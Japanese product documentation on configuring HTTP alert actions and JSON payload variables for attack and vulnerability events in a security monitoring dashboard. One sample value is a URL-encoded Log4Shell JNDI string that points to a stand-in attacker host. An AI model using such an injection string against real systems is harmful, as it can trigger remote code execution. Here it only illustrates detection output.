HTTP アラートの作成
[アラート(Alerts)] タブでは、電子メールおよび HTTP ベースのアラートを設定できます。Secure Application が新しい攻撃、脆弱性、またはビジネスリスクを検出したときにアラートを受け取るようにアクションを設定できます。
注: [編集(Edit)](管理者またはテナントレベル)権限を持つユーザーのみが [アラート(Alerts)] にアクセスできます。管理者またはテナントレベルよりも低い権限を持つ RBAC ユーザーはアラートを作成できません。
- Secure Application ダッシュボードから、[Alerts] に移動します。
- [HTTP] タブで、[+ アクションの追加(+ Add Action)] をクリックします。
- [アクション名(Action Name)] に入力します。
[アクション名(Action Name)] には特殊文字を使用しないでください。
- [イベントタイプ(Event Type)] では、[脆弱性(Vulnerability)]、[ビジネスリスク(Business Risk)]、または [攻撃(Attack)] を選択します。
- [次へ(Next)] をクリックします。
- [アクションの詳細(Action Details)] に、次を入力します。
- [メソッドタイプ(Method Type)]:POST
- [エンコーディング(Encoding)]:UTF-8
- [(オプション)[アプリケーション(Applications)]:このアクションが適用されるアプリケーションをプルダウンリストから最大 100 個選択。リストに入力することで、リストをフィルタリングできます。デフォルトでは、このアクションはすべてのアプリケーションに適用されます。
- [Raw URL]:HTTP リクエストの Raw URL を入力します。
- [次へ(Next)] をクリックします。
- [認証タイプ(Authentication Type)] で、次のように選択します。
- [None]:通信が暗号化されていない場合に選択
- [Basic] を選択してユーザー名とパスワードを入力
- [Bearer Token] を選択してトークンを入力
- [次へ(Next)] をクリックします。
- (オプション)リクエストのカスタムヘッダーを指定します。
- [次へ(Next)] をクリックします。
- [Add Payload] をクリックします。
ペイロードは有効な JSON である必要があります。[事前定義の変数(Predefined Variables)] の内容をコピーして、[エディタ(Editor)] にその変数を貼り付けます。たとえば、[Event Type] に [Attack] を選択した場合、[Add Payload] をクリックしたときに、攻撃イベントに関連する変数を選択できます。
攻撃変数:
フィールド 説明 値の例 $attack.id攻撃の一意の識別子 "SQL_INJECTION_001"$attack.status攻撃の現在のステータス "ACTIVE"、"RESOLVED"、"INVESTIGATING"$attack.source攻撃の送信元または発生元 "External"、"Internal"、"Unknown"$attack.outcome攻撃の結果または成果 "BLOCKED"、"ALLOWED"、"PARTIALLY_BLOCKED"$attack.types検出された攻撃のタイプ "SQL Injection"、"XSS"、"CSRF"$attack.eventTrigger攻撃の検出をトリガーしたイベント "HTTP Request"、"Database Query"$attack.lastDetected攻撃が最後に検出された時点を示すタイムスタンプ。 "2023-10-15T14:30:00Z"$attack.events攻撃に関連する詳細なイベント。詳細については、以下の「攻撃イベント」の表を参照してください。 攻撃イベントの JSON 配列 $attack.eventsには、次のキーフィールドが含まれています。フィールド 説明 値の例 $attack.events.eventType攻撃中に検出されたアクティビティのタイプ "SOCKET_RESOLVE"$attack.events.attackType特定の攻撃カテゴリが検出されました "LOG4J"$attack.events.timestamp攻撃イベントが発生した時間 "2025-01-22T23:03:52Z"$attack.events.applicationName攻撃の影響を受けたアプリケーション "ExpoitsTestApp"$attack.events.tierName攻撃の影響を受けた階層 "ExpoitsTestTier"$attack.events.blocked攻撃がブロックされたかどうかを示します "true"、"false"$attack.events.attackOutcomeイベントの結果 "EXPLOITED"、"ATTEMPTED"、"BLOCKED"、"OBSERVED"、"UNKNOWN"$attack.events.stackTrace攻撃の発生源であるスタックトレース "java.lang.SecurityManager.checkConnect(...)"$attack.events.clientAddress要求を開始したクライアントの IP アドレス "127.11.11.1"$attack.events.clientPortクライアントで使用されるポート "40758"$attack.events.serverAddress要求を処理するサーバーの IP アドレス "127.12.12.1"$attack.events.serverPortサーバーで使用されるポート "8088"$attack.events.webTransactionUrlエクスプロイト試行に関与する完全な URL "https://vulnerable.app.com/login?user=%24%7Bjndi%3Aldap%3A%2F%2Fmalicious.attacker.com%2Fa%7D"$attack.events.maliciousIpOutイベント中に接続されたアウトバウンド IP アドレス "192.0.2.123"$attack.events.maliciousIpSourceOut悪意のある IP が一致する送信元(存在する場合) "10.1.2.45"$attack.events.detailJson構造化された技術メタデータ(クラス、ソケット、メソッドなど) {"classname": "java.net.SocketPermission", ...}攻撃イベントが脆弱性によって引き起こされた場合、
$attack.eventsには次の追加フィールドが含まれる場合があります。表 1. 脆弱性に関連した攻撃イベントのフィールド フィールド 説明 値の例 $attack.events.vulnerableMethod脆弱性がトリガーされたメソッド "org.apache.logging.log4j.core.lookup.JndiLookup.lookup(Thread.java:234)"$attack.events.matchedCveName一致した CVE の名前 "CVE-2021-44228"$attack.events.cveId一致した CVE の内部識別子 $attack.events.vulnerabilityInfo.cvePublishDateCVE 公開日 "2021-12-10T10:10:01Z"$attack.events.vulnerabilityInfo.cvssScoreCVSS リスクスコア(0 〜 10) 10$attack.events.vulnerabilityInfo.cvssSeverityCVSS に基づくシビラティレベル "CRITICAL"$attack.events.vulnerabilityInfo.library関連する脆弱なライブラリ "org.apache.logging.log4j:log4j-core"$attack.events.vulnerabilityInfo.title人間が判読可能な脆弱性についての説明 "Remote Code Execution (RCE)"$attack.events.vulnerabilityInfo.kennaScoreKenna Security のリスクスコア 100$attack.events.vulnerabilityInfo.kennaActiveInternetBreach脆弱性が積極的に不正利用されることが知られているかどうか true、false$attack.events.vulnerabilityInfo.kennaEasilyExploitable脆弱性のエクスプロイトが容易かどうか true、false$attack.events.vulnerabilityInfo.kennaPredictedExploitable予測モデルによるエクスプロイト可能性のアセスメント true、false$attack.events.vulnerabilityInfo.kennaPopularTarget組織全体でよく狙われるターゲットかどうか true、falseヒント:事前定義の変数
$attack.eventsを選択して、攻撃に関連付けられた脆弱性に関する詳細をペイロードに含めます。事前定義の変数
$attack.eventsを選択して、256 行のスタックトレースをペイロードに含めます。 - [cURL]、[一般情報(General Information)]、[アクション(Actions)]、[セキュリティ(Security)]、[カスタムヘッダー(Custom Headers)]、および [ペイロード(Payload)] の各情報を確認します。
ServiceNow のペイロードの例:
- [Save] をクリックします。